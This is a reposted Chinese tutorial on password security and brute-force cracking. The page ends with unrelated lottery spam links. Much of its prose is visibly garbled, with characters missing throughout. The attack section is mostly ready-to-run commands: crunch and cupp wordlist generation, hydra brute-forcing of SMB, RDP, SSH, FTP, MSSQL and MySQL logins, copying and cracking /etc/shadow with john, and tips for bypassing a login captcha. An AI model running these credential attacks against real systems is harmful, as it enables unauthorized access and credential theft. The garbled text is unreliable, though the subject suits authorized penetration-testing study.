安基网 首页 安全 安全学院 查看内容

口令安全(口令爆破)

2020-9-1 08:47| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 令安全威胁现在很多地都是以户名(账户)和令(密码)作为鉴权的式,令(密码)就意味着访问权限。站后台数据库服务器个电脑QQ邮箱...令的安全现状令(密码)对于保护资产来讲是关重要,保证令安全也是重要的课题之。令所临的安全险:令泄露以件的式保存令站的配置件源代码中的注释备份件邮件,令以明的式出现 ...

令安全威胁

现在很多地都是以户名(账户)和令(密码)作为鉴权的式,令(密码)就意味着访问权限。

站后台
数据库
服务器
个电脑
QQ
邮箱
...

令的安全现状

令(密码)对于保护资产来讲是关重要,保证令安全也是重要的课题之。

令所临的安全险:

令泄露

以件的式保存令
站的配置件
源代码中的注释
备份件
邮件,令以明的式出现在邮件中
浏览器中保存的账密
....

弱令

123456|654321|8888888|admin,都是常的弱密码
...

默认令

phpStudy 中mysql 默认账密[root:root]
Tomcat 管理控制台默认账密[tomcat:tomcat]
...

明传输

http|ftp|telnet 等等服务,都是明传输的
被嗅探
...


令的破解式

暴破解

暴破解是最原始,最粗暴的破解法。

暴破解就是利所有可能的字符组成密码字典,去尝试破解,根据运算能,如果能够承受的起时间成本,最终定会爆破出密码。

密码空间

所有可能的密码的个数

密码空间的影响因素

字符集合
密码位数

密码字典成具 - crunch

crunch 8 8 0123456789
crunch 8 8 0123456789abcdefghijklmnopqrstuvwxyz
crunch 1 8 0123456789abcdefghijklmnopqrstuvwxyz
crunch 8 8 -t 1990%%%% // % 占用一位


crunch -h



字典破解

如果能够通过较合理的条件,筛选或者过滤掉些全字符组合的内容,就会幅度降低爆破的成本。把筛选出的特定的密码组合成具有明显特征的字典。密码字典就是暴破解中密码空间的集。但是,在密码字典进爆破的时候,有可能会漏掉真正的密码。

kali 中的字典

/usr/share/wordlists/rockyou.txt.gz



弱令字典

123456
admin
root
...

社字典

们在设置密码的时候,往往为了便于记忆,密码的内容和组合会与个信息有关,如常的密码组合 ”名字+“。

wenxin1985

社字典更具针对性,准确率有可能会较。

亦思社会程学字典成器
cupp -i




字符集字典

字符集合
密码位数
组合法
...

简单的例子

密码组合:数字+".com"
密码位数:7
示例:000.com|001.com
crunch 7 7 -t %%%.com > test.dic


令破解的式

在线(远程)令破解

户名和密码需要在服务器端验证,需要络连接
站后台
RDP
SSH
...

离线密码破解

直接破解的是密码密
MD5 密
/etc/shadow
...

令破解的情况

  • 户名未知,密码未知
  • 户名已知,密码未知
  • 户名未知,密码已知

Hydra - 远程令破解神器

命令速查



远程令破解实例


远程爆破windows 令

SMB 服务

hydra smb://192.168.152.160 -L /home/kali/dic/test/user.dic -P
/home/kali/dic/test/pass.dic -vV -t 8 -o 109.smb
hydra smb://192.168.152.160 -L /home/kali/dic/test/user.dic -P
/home/kali/dic/test/pass.dic -vV -t 8 -o 109.smb -f

RDP 服务

 hydra rdp://192.168.16.109 -l administrator -P
/home/kali/dic/test/pass.dic -t 1 -o 109.rdp -f

远程爆破Linux 令

SSH 服务

hydra ssh://10.10.10.218 -L /home/kali/dic/test/user.dic -P
/home/kali/dic/test/pass.dic -vV -o 218.ssh -f -e nsr

其他服务的爆破

FTP 服务

hydra ftp://192.168.16.200 -L user.dic -P pass.dic -f -vV -e nsr

SQL Server 服务

hydra mssql://192.168.16.200 -L user.dic -P pass.dic -f -vV -e nsr

MySQL 服务

sudo hydra mysql://127.0.0.1 -L /home/kali/dic/test/user.dic -P
/home/kali/dic/test/pass.dic -f -vV -t 1 -o 127.mysql -e nsr

离线密码破解

sudo cp /etc/shadow ./
john shadow
john shadow --wordlist=rockyou.txt
john shadow --show

md5 密破解

https://www.cmd5.com/
https://pmd5.com/

站后台爆破

Burp Suite
Intruder
有验证码
ttt如果验证码不能识别或者不能爆破,基本上可以放弃了。
ttt绕过验证码
ttttt直接删除验证码
ttttt是否在Cookie

cms后台管理登录为例:











Well Done!!!



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6866974898665816580/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
山东11选5开奖 山东11选5计划 极速赛车登陆 豪客彩票计划群 山东11选5走势 北京11选5开奖 极速赛车压8码 汇丰彩票官网 福建快3 第1彩票计划群